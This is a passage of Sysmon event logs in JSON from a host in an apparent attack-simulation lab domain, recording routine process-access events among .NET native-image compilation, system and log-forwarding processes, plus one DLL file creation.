C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:41.091","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1391-5F25-0000-0010020B1000}","TargetProcessId":"4720","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:41","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8661,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:41.091\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1391-5F25-0000-0010020B1000}\r\nTargetProcessId: 4720\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:41.091","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1391-5F25-0000-0010020B1000}","TargetProcessId":"4720","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:41","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8662,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:41.310\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1378-5F25-0000-0010DC410F00}\r\nTargetProcessId: 5036\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:41.310","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1378-5F25-0000-0010DC410F00}","TargetProcessId":"5036","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:41","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8663,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:41.310\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1378-5F25-0000-0010DC410F00}\r\nTargetProcessId: 5036\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:41.310","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1378-5F25-0000-0010DC410F00}","TargetProcessId":"5036","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:41","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8664,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:41.310\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1378-5F25-0000-0010DC410F00}\r\nTargetProcessId: 5036\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:41.310","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1378-5F25-0000-0010DC410F00}","TargetProcessId":"5036","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:41","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8665,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:41.388\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:41.388","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:02:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:42","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8666,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:42.404\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:42.404","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:02:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:42","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8667,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:02:42.670\r\nProcessGuid: {E2A3D6B1-1391-5F25-0000-00106A101000}\r\nProcessId: 5036\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\13ac-0\\System.Web.Extensions.dll\r\nCreationUtcTime: 2020-08-01 07:02:42.670","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:02:42.670","ProcessGuid":"{E2A3D6B1-1391-5F25-0000-00106A101000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\13ac-0\\System.Web.Extensions.dll","CreationUtcTime":"2020-08-01 07:02:42.670","EventReceivedTime":"2020-08-01 07:02:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:42","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8668,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:42.748\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-137F-5F25-0000-001050AE0F00}\r\nTargetProcessId: 1364\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:42.748","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-137F-5F25-0000-001050AE0F00}","TargetProcessId":"1364","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
